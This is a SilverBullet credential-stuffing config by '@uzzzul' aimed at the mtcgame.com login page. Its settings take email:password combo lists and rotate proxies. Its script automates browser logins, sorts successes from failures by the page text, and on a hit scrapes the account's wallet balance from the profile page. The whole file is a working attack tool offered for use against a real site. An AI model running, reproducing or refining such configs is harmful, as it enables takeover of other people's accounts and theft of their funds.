[SETTINGS]
{
  "Name": "mtcgame-selenium",
  "SuggestedBots": 5,
  "MaxCPM": 0,
  "LastModified": "2022-01-04T22:58:20.2734922+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "mtcgame-selenium",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
BROWSERACTION Open 

NAVIGATE "https://www.mtcgame.com/login" 

#1 FUNCTION Delay "1000" 

#USER ELEMENTACTION XPath "//*[@id=\"emailID\"]" 
  SendKeys "<USER>" 

#2 FUNCTION Delay "1000" 

#PASS ELEMENTACTION XPath "//*[@id=\"password\"]" 
  SendKeysHuman "<PASS>" 

#3 FUNCTION Delay "1000" 

#LOGIN ELEMENTACTION XPath "/html/body/div[1]/div[2]/div[1]/div[1]/div/div[1]/form/div[3]/div[1]/button/span" 
  Click 

#4 FUNCTION Delay "1000" 

BROWSERACTION DOMtoSOURCE "<SOURCE>" 

#5 FUNCTION Delay "1000" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "User Name and Password Does Not Match!" 
  KEYCHAIN Success OR 
    KEY "Login Success" 

#6 FUNCTION Delay "1000" 

NAVIGATE "https://www.mtcgame.com/profile" 

#6 FUNCTION Delay "500" 

#wallet ELEMENTACTION XPath "/html/body/div[1]/div[2]/div[1]/div[1]/div/div[1]/div/div/form/div/div[1]/div[1]/div[1]/div[1]/p" 
  WaitForElement 

ELEMENTACTION XPath "/html/body/div[1]/div[2]/div[1]/div[1]/div/div[1]/div/div/form/div/div[1]/div[1]/div[1]/div[1]/p" 
  GetText -> CAP "WALLET" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

